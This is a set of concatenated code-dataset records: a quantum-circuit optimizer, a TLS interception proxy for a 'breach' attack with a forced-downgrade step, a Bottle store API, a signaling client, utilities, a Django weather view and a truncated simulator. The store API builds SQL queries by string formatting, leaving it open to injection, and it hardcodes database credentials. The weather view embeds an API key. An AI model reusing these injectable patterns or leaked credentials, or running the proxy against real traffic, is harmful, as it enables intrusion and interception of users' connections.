Returns True for the\n Operations to be grouped together, False for the others.\n Returns:\n Tuple[Sequence[Command]]: A, B, C such that A+B+C is equivalent to seq,\n and A and C do not contain any marked Operation instances.\n \"\"\"\n\n def find_first_index(seq):\n \"\"\"Index of the first element in the sequence for which the predicate function returns True.\n If no such element exists, returns the length of the sequence.\n \"\"\"\n return next((i for i, e in enumerate(seq) if predicate(e.op)), len(seq))\n\n def marked_last(node):\n \"\"\"Mapping from nodes to sorting keys to resolve ambiguities in the topological sort.\n Larger key values come later in the lexicographical-topological ordering.\n \"\"\"\n if predicate(node.op):\n return 1\n return 0\n\n def lex_topo(seq, key):\n \"\"\"Sorts a Command sequence lexicographical-topologically using the given lexicographic key function.\"\"\"\n DAG = list_to_DAG(seq)\n return list(nx.algorithms.dag.lexicographical_topological_sort(DAG, key=key))\n\n C = lex_topo(seq, key=marked_last)\n ind = find_first_index(C)\n A = C[:ind] # initial unmarked instances\n B = C[ind:] # marked and possibly unmarked\n\n # re-sort B, marked instances first\n C = lex_topo(B, key=lambda x: -marked_last(x))\n # find last marked\n ind = len(C) - find_first_index(list(reversed(C)))\n B = C[:ind] # marked and still possibly unmarked\n C = C[ind:] # final unmarked instances\n return A, B, C\n\n\ndef optimize_circuit(seq):\n \"\"\"Try to simplify and optimize a quantum circuit.\n\n The purpose of the optimizer is to simplify the circuit\n to make it cheaper and faster to execute. Different backends may require\n different types of optimization, but in general the fewer operations a circuit has,\n the faster it should run. The optimizer thus should convert the circuit into a\n simpler :term:`equivalent circuit`.\n\n The optimizations are based on the abstract algebraic properties of the Operations\n constituting the circuit, e.g., combining two consecutive gates of the same gate family,\n and at no point should require a matrix representation of any kind.\n The optimization must also not change the state of the RegRefs in any way.\n\n Currently the optimization is very simple. It\n\n * merges neighboring :class:`state preparations <.Preparation>` and :class:`gates <.Gate>`\n belonging to the same family and acting on the same sequence of subsystems\n * cancels neighboring pairs of a gate and its inverse\n\n Args:\n seq (Sequence[Command]): quantum circuit to optimize\n\n Returns:\n List[Command]: optimized circuit\n \"\"\"\n\n def _print_list(i, q, print_fn=print):\n \"For debugging.\"\n # pylint: disable=unreachable\n return\n print_fn(\"i: {}, len: {} \".format(i, len(q)), end=\"\")\n for x in q:\n print_fn(x.op, \", \", end=\"\")\n print_fn()\n\n grid = list_to_grid(seq)\n\n # try merging neighboring operations on each wire\n # TODO the merging could also be done using the circuit DAG, which\n # might be smarter (ns>1 would be easy)\n for k in grid:\n q = grid[k]\n i = 0 # index along the wire\n _print_list(i, q)\n while i + 1 < len(q):\n # at least two operations left to merge on this wire\n try:\n a = q[i]\n b = q[i + 1]\n # the ops must have equal size and act on the same wires\n if a.op.ns == b.op.ns and a.reg == b.reg:\n if a.op.ns != 1:\n # ns > 1 is tougher. 
on no wire must there be anything\n # between them, also deleting is more complicated\n # todo treat it as a failed merge for now\n i += 1\n continue\n op = a.op.merge(b.op)\n # merge was successful, delete the old ops\n del q[i : i + 2]\n # insert the merged op (unless it's identity)\n if op is not None:\n q.insert(i, Command(op, a.reg))\n # move one spot backwards to try another merge\n if i > 0:\n i -= 1\n _print_list(i, q)\n continue\n except MergeFailure:\n pass\n i += 1 # failed at merging the ops, move forward\n\n # convert the circuit back into a list (via a DAG)\n DAG = grid_to_DAG(grid)\n return DAG_to_list(DAG)\n","sub_path":"strawberryfields/program_utils.py","file_name":"program_utils.py","file_ext":"py","file_size_in_byte":14234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"612393885","text":"'''\nFile: connect.py\nAuthor: Dimitris Karakostas\nDescription: Network connection and traffic parsing on TLS level.\n'''\n\nimport socket\nimport select\nimport logging\nimport binascii\nimport sys\nimport signal\nfrom iolibrary import kill_signal_handler, get_arguments_dict, setup_logger\nimport constants\n\n\nsignal.signal(signal.SIGINT, kill_signal_handler)\n\n\nclass Connector():\n '''\n Class that handles the network connection for breach.\n '''\n def __init__(self, args_dict):\n '''\n Initialize loggers and arguments dictionary.\n '''\n self.args_dict = args_dict\n if 'full_logger' not in args_dict:\n if args_dict['verbose'] < 4:\n setup_logger('full_logger', 'full_breach.log', args_dict, logging.ERROR)\n else:\n setup_logger('full_logger', 'full_breach.log', args_dict)\n self.full_logger = logging.getLogger('full_logger')\n self.args_dict['full_logger'] = self.full_logger\n else:\n self.full_logger = args_dict['full_logger']\n if 'basic_logger' not in args_dict:\n if args_dict['verbose'] < 3:\n setup_logger('basic_logger', 'basic_breach.log', args_dict, logging.ERROR)\n else:\n setup_logger('basic_logger', 'basic_breach.log', args_dict)\n self.basic_logger = logging.getLogger('basic_logger')\n self.args_dict['basic_logger'] = self.basic_logger\n else:\n self.basic_logger = args_dict['basic_logger']\n if 'debug_logger' not in args_dict:\n if args_dict['verbose'] < 2:\n setup_logger('debug_logger', 'debug.log', args_dict, logging.ERROR)\n else:\n setup_logger('debug_logger', 'debug.log', args_dict)\n self.debug_logger = logging.getLogger('debug_logger')\n self.args_dict['debug_logger'] = self.debug_logger\n else:\n self.debug_logger = args_dict['debug_logger']\n return\n\n def log_data(self, data):\n '''\n Print hexadecimal and ASCII representation of data\n '''\n pad = 0\n output = []\n buff = '' # Buffer of 16 chars\n\n for i in xrange(0, len(data), constants.LOG_BUFFER):\n buff = data[i:i+constants.LOG_BUFFER]\n hex = binascii.hexlify(buff) # Hex representation of data\n pad = 32 - len(hex)\n txt = '' # ASCII representation of data\n for ch in buff:\n if ord(ch) > 126 or ord(ch) < 33:\n txt = txt + '.'\n else:\n txt = txt + chr(ord(ch))\n output.append('%2d\\t %s%s\\t %s' % (i, hex, pad*' ', txt))\n\n return '\\n'.join(output)\n\n def parse(self, data, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, is_response=False):\n '''\n Parse data and print header information and payload.\n '''\n lg = ['\\n']\n downgrade = False\n\n # Check for defragmentation between packets\n if is_response:\n # Check if TLS record header was chunked between packets and append it to the beginning\n if 
chunked_endpoint_header:\n data = chunked_endpoint_header + data\n chunked_endpoint_header = None\n # Check if there are any remaining bytes from previous record\n if past_bytes_endpoint:\n lg.append('Data from previous TLS record: Endpoint\\n')\n if past_bytes_endpoint >= len(data):\n lg.append(self.log_data(data))\n lg.append('\\n')\n past_bytes_endpoint = past_bytes_endpoint - len(data)\n return ('\\n'.join(lg), past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n else:\n lg.append(self.log_data(data[0:past_bytes_endpoint]))\n lg.append('\\n')\n data = data[past_bytes_endpoint:]\n past_bytes_endpoint = 0\n else:\n if chunked_user_header:\n data = chunked_user_header + data\n chunked_user_header = None\n if past_bytes_user:\n lg.append('Data from previous TLS record: User\\n')\n if past_bytes_user >= len(data):\n lg.append(self.log_data(data))\n lg.append('\\n')\n past_bytes_user = past_bytes_user - len(data)\n return ('\\n'.join(lg), past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n else:\n lg.append(self.log_data(data[0:past_bytes_user]))\n lg.append('\\n')\n data = data[past_bytes_user:]\n past_bytes_user = 0\n\n try:\n cont_type = ord(data[constants.TLS_CONTENT_TYPE])\n version = (ord(data[constants.TLS_VERSION_MAJOR]), ord(data[constants.TLS_VERSION_MINOR]))\n length = 256*ord(data[constants.TLS_LENGTH_MAJOR]) + ord(data[constants.TLS_LENGTH_MINOR])\n except Exception as exc:\n self.full_logger.debug('Only %d remaining for next record, TLS header gets chunked' % len(data))\n self.full_logger.debug(exc)\n if is_response:\n chunked_endpoint_header = data\n else:\n chunked_user_header = data\n return ('', past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n\n if is_response:\n if cont_type in constants.TLS_CONTENT:\n self.basic_logger.debug('Endpoint %s Length: %d' % (constants.TLS_CONTENT[cont_type], length))\n '''\n if cont_type == 23:\n with open('out.out', 'a') as f:\n f.write('Endpoint application payload: %d\\n' % length)\n f.close()\n '''\n else:\n self.basic_logger.debug('Unassigned Content Type record (len = %d)' % len(data))\n lg.append('Source : Endpoint')\n else:\n if cont_type in constants.TLS_CONTENT:\n self.basic_logger.debug('User %s Length: %d' % (constants.TLS_CONTENT[cont_type], length))\n if cont_type == 22:\n if ord(data[constants.MAX_TLS_POSITION]) > constants.MAX_TLS_ALLOWED:\n downgrade = True\n '''\n if cont_type == 23:\n with open('out.out', 'a') as f:\n f.write('User application payload: %d\\n' % length)\n f.close()\n '''\n else:\n self.basic_logger.debug('Unassigned Content Type record (len = %d)' % len(data))\n lg.append('Source : User')\n\n try:\n lg.append('Content Type : ' + constants.TLS_CONTENT[cont_type])\n except:\n lg.append('Content Type: Unassigned %d' % cont_type)\n try:\n lg.append('TLS Version : ' + constants.TLS_VERSION[(version[0], version[1])])\n except:\n lg.append('TLS Version: Unknown %d %d' % (version[0], version[1]))\n lg.append('TLS Payload Length: %d' % length)\n lg.append('(Remaining) Packet Data length: %d\\n' % len(data))\n\n # Check if TLS record spans to next TCP segment\n if len(data) - constants.TLS_HEADER_LENGTH < length:\n if is_response:\n past_bytes_endpoint = length + constants.TLS_HEADER_LENGTH - len(data)\n else:\n past_bytes_user = length + constants.TLS_HEADER_LENGTH - len(data)\n\n lg.append(self.log_data(data[0:constants.TLS_HEADER_LENGTH]))\n 
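# log the TLS record header bytes first, then the payload they describe\n 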
lg.append(self.log_data(data[constants.TLS_HEADER_LENGTH:constants.TLS_HEADER_LENGTH+length]))\n lg.append('\\n')\n\n # Check if packet has more than one TLS records\n if length < len(data) - constants.TLS_HEADER_LENGTH:\n more_records, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, _ = self.parse(data[constants.TLS_HEADER_LENGTH+length:],\n past_bytes_endpoint,\n past_bytes_user,\n chunked_endpoint_header,\n chunked_user_header,\n is_response)\n lg.append(more_records)\n\n return ('\\n'.join(lg), past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade)\n\n def start(self):\n '''\n Start sockets on user side (proxy as server) and endpoint side (proxy as client).\n '''\n self.full_logger.info('Starting Proxy')\n\n try:\n self.user_setup()\n self.endpoint_setup()\n except:\n pass\n\n self.full_logger.info('Proxy is set up')\n return\n\n def restart(self, attempt_counter=0):\n '''\n Restart sockets in case of error.\n '''\n self.full_logger.info('Restarting Proxy')\n\n try:\n self.user_socket.close()\n self.endpoint_socket.close()\n except:\n pass\n\n try:\n self.user_setup()\n self.endpoint_setup()\n except:\n if attempt_counter < 3:\n self.full_logger.debug('Reattempting restart')\n self.restart(attempt_counter+1)\n else:\n self.full_logger.debug('Multiple failed attempts to restart')\n self.stop(-9)\n sys.exit(-1)\n\n self.full_logger.info('Proxy has restarted')\n return\n\n def stop(self, exit_code=0):\n '''\n Shutdown sockets and terminate connection.\n '''\n try:\n self.user_connection.close()\n self.endpoint_socket.close()\n except:\n pass\n self.full_logger.info('Connection closed')\n self.debug_logger.debug('Stopping breach object with code: %d' % exit_code)\n return\n\n def user_setup(self):\n '''\n Create and configure user side socket.\n '''\n try:\n self.full_logger.info('Setting up user socket')\n user_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n user_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Set options to reuse socket\n user_socket.bind((constants.USER, constants.TLS_PORT))\n self.full_logger.info('User socket bind complete')\n user_socket.listen(1)\n self.full_logger.info('User socket listen complete')\n self.user_connection, self.address = user_socket.accept()\n self.user_socket = user_socket\n self.full_logger.info('User socket is set up')\n except:\n self.stop(-8)\n sys.exit(-1)\n return\n\n def endpoint_setup(self):\n '''\n Create and configure endpoint side socket\n '''\n try:\n self.full_logger.info('Setting up endpoint socket')\n endpoint_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.full_logger.info('Connecting endpoint socket')\n endpoint_socket.connect((constants.GMAIL_IP, constants.TLS_PORT))\n endpoint_socket.setblocking(0) # Set non-blocking, i.e. 
raise exception if send/recv is not completed\n self.endpoint_socket = endpoint_socket\n self.full_logger.info('Endpoint socket is set up')\n except:\n self.stop(-7)\n sys.exit(-1)\n return\n\n def execute_breach(self):\n '''\n Start proxy and execute main loop\n '''\n # Initialize parameters for execution.\n past_bytes_user = 0 # Number of bytes expanding to future user packets\n past_bytes_endpoint = 0 # Number of bytes expanding to future endpoint packets\n chunked_user_header = None # TLS user header portion that gets stuck between packets\n chunked_endpoint_header = None # TLS endpoint header portion that gets stuck between packets\n\n self.start()\n self.full_logger.info('Starting main proxy loop')\n try:\n while 1:\n ready_to_read, ready_to_write, in_error = select.select([self.user_connection, self.endpoint_socket],\n [],\n [],\n 5)\n\n if self.user_connection in ready_to_read: # If user side socket is ready to read...\n data = ''\n\n try:\n data = self.user_connection.recv(constants.SOCKET_BUFFER) # ...receive data from user...\n except Exception as exc:\n self.full_logger.debug('User connection error')\n self.full_logger.debug(exc)\n self.stop(-6)\n break\n\n if len(data) == 0:\n self.full_logger.info('User connection closed')\n self.stop(-5)\n else:\n self.basic_logger.debug('User Packet Length: %d' % len(data))\n output, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, downgrade = self.parse(data,\n past_bytes_endpoint,\n past_bytes_user,\n chunked_endpoint_header,\n chunked_user_header) # ...parse it...\n self.full_logger.debug(output)\n try:\n if downgrade and constants.ATTEMPT_DOWNGRADE:\n alert = 'HANDSHAKE_FAILURE'\n output, _, _, _, _, _ = self.parse(constants.ALERT_MESSAGES[alert],\n past_bytes_endpoint,\n past_bytes_user,\n True)\n self.full_logger.debug('\\n\\n' + 'Downgrade Attempt' + output)\n self.user_connection.sendall(constants.ALERT_MESSAGES[alert]) # if we are trying to downgrade, send fatal alert to user\n continue\n self.endpoint_socket.sendall(data) # ...and send it to endpoint\n except Exception as exc:\n self.full_logger.debug('User data forwarding error')\n self.full_logger.debug(exc)\n self.stop(-4)\n break\n\n if self.endpoint_socket in ready_to_read: # Same for the endpoint side\n data = ''\n\n try:\n data = self.endpoint_socket.recv(constants.SOCKET_BUFFER)\n except Exception as exc:\n self.full_logger.debug('Endpoint connection error')\n self.full_logger.debug(exc)\n self.stop(-3)\n break\n\n if len(data) == 0:\n self.full_logger.info('Endpoint connection closed')\n self.stop(5)\n break\n else:\n self.basic_logger.debug('Endpoint Packet Length: %d' % len(data))\n output, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, _ = self.parse(data,\n past_bytes_endpoint,\n past_bytes_user,\n chunked_endpoint_header,\n chunked_user_header,\n True)\n self.full_logger.debug(output)\n try:\n self.user_connection.sendall(data)\n except Exception as exc:\n self.full_logger.debug('Endpoint data forwarding error')\n self.full_logger.debug(exc)\n self.stop(-2)\n break\n except:\n self.stop(-1)\n return\n\nif __name__ == '__main__':\n args_dict = get_arguments_dict(sys.argv)\n conn = Connector(args_dict)\n conn.full_logger.info('Hillclimbing parameters file created')\n conn.execute_breach()\n","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":18962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"213795748","text":"from bottle import route, run, template, static_file, get, post, delete, request\nimport json\nimport pymysql\n\nconnection = pymysql.connect(host='sql11.freesqldatabase.com',\n user='sql11189251',\n password='bEzYRY6iRP',\n db='sql11189251',\n charset='utf8mb4',\n autocommit=True,\n cursorclass=pymysql.cursors.DictCursor)\ncursor = connection.cursor();\n\n\n@get(\"/admin\")\ndef admin_portal():\n return template(\"pages/admin.html\")\n\n\n# List Categories\n@get(\"/categories\")\ndef list_categories():\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM categories;\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return json.dumps({'STATUS': 'SUCCESS', 'CATEGORIES': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# List All Products\n@get(\"/products\")\ndef list_all_products():\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM products;\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCTS': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# List Products by Category\n@get(\"/category//products\")\ndef list_products_by_category(id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM products WHERE category={};\".format(id)\n cursor.execute(sql)\n result = cursor.fetchall()\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCTS': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Getting a Product\n@get(\"/product/\")\ndef get_product(id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM products WHERE id={};\".format(id)\n cursor.execute(sql)\n result = cursor.fetchone()\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCT': result, 'CODE': 200})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Creating a Category (ignoring 'bad request' error as I accept any category name)\n@post(\"/category\")\ndef create_category():\n try:\n with connection.cursor() as cursor:\n new_category = request.POST.get(\"name\")\n sql = \"SELECT count(*) FROM categories WHERE name='{}'\".format(new_category)\n cursor.execute(sql)\n result = cursor.fetchone()\n if result['count(*)'] > 0:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Category already exists', 'CODE': 200})\n else:\n sql_query = \"INSERT INTO categories (name) VALUES ('{0}')\".format(new_category)\n cursor.execute(sql_query)\n result = cursor.lastrowid\n return json.dumps({'STATUS': 'SUCCESS', 'CAT_ID': result, 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Add/Edit a Product (ignoring 'category not found' because it is a drop-down so will always be correct)\n@post(\"/product\")\ndef add_edit_product():\n product_category = request.POST.get(\"category\")\n product_description = request.POST.get(\"description\")\n product_price = request.POST.get(\"price\")\n product_title = request.POST.get(\"title\")\n product_favorite = request.POST.get(\"favorite\")\n if product_favorite is \"on\":\n product_favorite=1\n else:\n product_favorite=0\n product_img_url = request.POST.get(\"img_url\")\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT count(*) FROM products WHERE title='{}'\".format(product_title)\n cursor.execute(sql)\n 
result = cursor.fetchone()\n if result['count(*)'] > 0:\n sql_update = \"UPDATE products SET category='{0}', description='{1}', price='{2}', favorite='{3}', img_url='{4}' WHERE title='{5}'\".format(product_category, product_description, product_price, product_favorite, product_img_url, product_title)\n cursor.execute(sql_update)\n product_id = 0 #sorry, from Lauren\n else:\n sql_add = \"INSERT INTO products (category, description, price, title, favorite, img_url) VALUES ({0},'{1}',{2},'{3}',{4},'{5}')\".format(product_category, product_description, product_price, product_title, product_favorite, product_img_url)\n cursor.execute(sql_add)\n product_id = cursor.lastrowid\n return json.dumps({'STATUS': 'SUCCESS', 'PRODUCT_ID': product_id, 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Deleting a Category\n@delete(\"/category/<id>\")\ndef delete_category(id):\n try:\n with connection.cursor() as cursor:\n sql = \"DELETE FROM categories WHERE id={0}\".format(id)\n sql2 = \"DELETE FROM products WHERE category={0}\".format(id)\n cursor.execute(sql)\n cursor.execute(sql2)\n return json.dumps({'STATUS': 'SUCCESS', 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n# Deleting a Product\n@delete(\"/product/<id>\")\ndef delete_product(id):\n try:\n with connection.cursor() as cursor:\n sql = \"DELETE FROM products WHERE id={0}\".format(id)\n cursor.execute(sql)\n return json.dumps({'STATUS': 'SUCCESS', 'CODE': 201})\n except Exception:\n return json.dumps({'STATUS': 'ERROR', 'MSG': 'Internal error', 'CODE': 500})\n\n\n@get(\"/\")\ndef index():\n return template(\"index.html\")\n\n\n@get('/js/<filename>')\ndef javascripts(filename):\n return static_file(filename, root='js')\n\n\n@get('/css/<filename>')\ndef stylesheets(filename):\n return static_file(filename, root='css')\n\n\n@get('/images/<filename>')\ndef images(filename):\n return static_file(filename, root='images')\n\n\ndef main():\n run(host='localhost', port=7000)\n\nif __name__ == '__main__':\n main()","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"95014649","text":"# -*- coding: utf-8 -*-\n# [Name] getip.py\n# [Run] python getip.py\n# [Spec] obtains the peer's global IP and writes it to standard output;\n# logs are written to standard error in green\n# [Note] the signaling server (server.py) must already be running on the external server (sairilab.com:10007)\n\nimport socket\nimport sys\n\nserverHost='sairilab.com' # default signaling server\nlocalHost='0.0.0.0'\nport=25001\nlocalAddr=(localHost,port)\nserverAddr=(serverHost,10007)\nOKGREEN = '\\033[92m'\nWARNING = '\\033[93m'\nFAIL = '\\033[91m'\nENDC = '\\033[0m'\n\n\nsock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nsock.bind(localAddr)\nsys.stderr.write(OKGREEN + \"[Tokyo venue getip.py] : UDP socket bound (%s:%d)\\n\" % localAddr)\n
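# minimal signaling handshake: send one datagram so the server learns this\n# host's public address, then it replies with the peer's global IP (editor's summary)\n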
sock.sendto(\"ping\",serverAddr)\nsys.stderr.write(\"[Tokyo venue getip.py] : querying the signaling server.. (%s:%d)\\n\" % serverAddr)\n\ntargetIp,addr=sock.recvfrom(1024)\n\nsys.stderr.write(\"[Tokyo venue getip.py] : peer global address = %s\\n\" % targetIp)\nsys.stderr.write(ENDC)\nsys.stdout.write(\"%s\\n\" % targetIp)\n\nsock.close()\n\n\n","sub_path":"controllerTokyo/getip.py","file_name":"getip.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"222170118","text":"import numpy as np\nimport os\nimport torch\nfrom PIL import Image\n\nclass Logger():\n def __init__(self, path):\n self.logFile = open(path+\"log.txt\", \"w\")\n def __del__(self):\n self.logFile.close()\n\n def log(self, logStr):\n print(logStr)\n self.logFile.write(logStr+\"\\n\")\n self.logFile.flush()\n\n\ndef weightsInit(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n torch.nn.init.normal_(m.weight, 1.0, 0.02)\n torch.nn.init.zeros_(m.bias)\n\n\n\ndef listAllImg(dataPath):\n filePaths = []\n for root, dir, files in os.walk(dataPath):\n for file in files:\n if file.endswith(\".jpg\") or file.endswith(\".png\"):\n filePath = os.path.join(root, file)\n filePaths.append(filePath)\n \n return filePaths\n\ndef saveImage(args, epoch, i, imgs, interval=150):\n \n if i % interval != 0:\n return\n \n imgs = [img for img in imgs if img is not None] # 'is not None' instead of '!= None', which is unreliable for tensors\n\n for idx in range(len(imgs)):\n imgs[idx] = np.transpose(np.float32(imgs[idx].to(\"cpu\").detach().numpy()[0])*255, (1,2,0))\n\n img = combine(imgs)\n img.save(args.savePath+\"img_%d_%d.png\"%(epoch,i))\n\ndef combine(imgs):\n\n for i in range(len(imgs)):\n imgs[i] = Image.fromarray(np.uint8(imgs[i]))\n\n widths, heights = zip(*(i.size for i in imgs))\n totalWidth = sum(widths)\n totalHeight = max(heights)\n\n new_img = Image.new(\"RGB\", (totalWidth, totalHeight))\n offset = 0\n for img in imgs:\n new_img.paste(img, (offset, 0))\n offset += img.size[0]\n\n return new_img\n \n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"359438585","text":"from finished_bo import bak_ost\r\nfrom fgm import fgm\r\nimport math\r\nimport numpy as np\r\nimport time\r\n\r\ndef clog(x):\r\n vector = list(sorted(x, reverse=True))\r\n k = [math.log2(i) for i in range(1, len(vector) + 1)]\r\n ln = len(vector)\r\n y = [math.log2(i) for i in vector]\r\n A = np.vstack([k, np.ones(len(k))]).T\r\n m, c = np.linalg.lstsq(A, y)[0]\r\n return m\r\n\r\ndef main():\r\n result = open(\"test_res2.txt\", \"w\")\r\n a_variants = [0.5, 0.25, 0.75, 0.3]\r\n for a in a_variants:\r\n result.write(str(a) + \"\\n\")\r\n print(a)\r\n for k in range(5):\r\n graph = bak_ost(100000, 10, a)\r\n t = time.time()\r\n x = fgm(graph)\r\n t = time.time() - t\r\n lg = clog(x)\r\n print(lg, t)\r\n result.write(str(lg) + \" \" + str(t) + \"\\n\")\r\n graph = 0\r\n result.close()\r\n\r\nmain()\r\n","sub_path":"prlib/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"188317784","text":"from django.shortcuts import render\nimport urllib3, json\nfrom django.http import JsonResponse\n\n\ndef index(request):\n if request.method == 'POST':\n if request.is_ajax():\n\n plakakodu = request.POST.get('plakakodu', None)\n iladi = request.POST.get('iladi', None)\n\n 
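# editor's note: the OpenWeatherMap API key is embedded in the URL below;\n # reading it from settings or an environment variable would be safer\n 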
url = 'http://api.openweathermap.org/data/2.5/weather?q='+ iladi +'&appid=3ecd62f50fb752799243ba9fb83cc79b&units=metric'\n http = urllib3.PoolManager()\n resp = http.request('GET', url) # renamed from 'request' to avoid shadowing the view's request argument\n JSON = json.loads(resp.data.decode('utf8'))\n\n veri = {\n \"plakakodu\" : plakakodu,\n \"iladi\" : iladi,\n \"sicaklik\" : JSON['main']['temp'],\n }\n return JsonResponse(veri)\n return render(request, 'trHarita/index.html')","sub_path":"trHarita/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"300243941","text":"import math\nimport service\nimport fog_node\nimport matplotlib.pyplot as plt\n\nC = 6e7\n\ndef propagationDelay(point1, point2):\n return math.hypot(point1[0] - point2[0], point1[1] - point2[1]) / C\n\ndef getComputNodeDelay(srcDst, computeNode):\n tau = 0\n if computeNode.type == \"edge\" or computeNode.type == \"Edge\": # '==' instead of 'is' for string comparison\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n if srcDst[\"switch\"] is not computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"position\"], computeNode.switch[\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"] is not computeNode.switch[\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += propagationDelay(computeNode.switch[\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] is not computeNode.switch[\"parent\"][\"parent\"]:\n tau += computeNode.switch[\"parent\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"parent\"][\"parent\"][\"position\"])\n elif computeNode.type == \"cloud\" or computeNode.type == \"Cloud\":\n tau += propagationDelay(srcDst[\"position\"], srcDst[\"switch\"][\"position\"])\n tau += srcDst[\"switch\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"position\"], srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"])\n tau += srcDst[\"switch\"][\"parent\"][\"parent\"][\"delay\"]\n if srcDst[\"switch\"][\"parent\"][\"parent\"] is not computeNode.switch:\n tau += computeNode.switch[\"delay\"]\n tau += propagationDelay(srcDst[\"switch\"][\"parent\"][\"parent\"][\"position\"], computeNode.switch[\"position\"])\n tau += propagationDelay(computeNode.position, computeNode.switch[\"position\"])\n else:\n raise Exception(\"{} not found\".format(computeNode.type))\n return tau\n\nclass Simulator:\n def __init__(self, name, d, switches, epsilon=1e0):\n self.name = name\n self.epsilon = epsilon\n self.switches = switches\n for list1, list2 in zip(self.switches[0:2], self.switches[1:3]):\n for switch1 in list1:\n distances = 
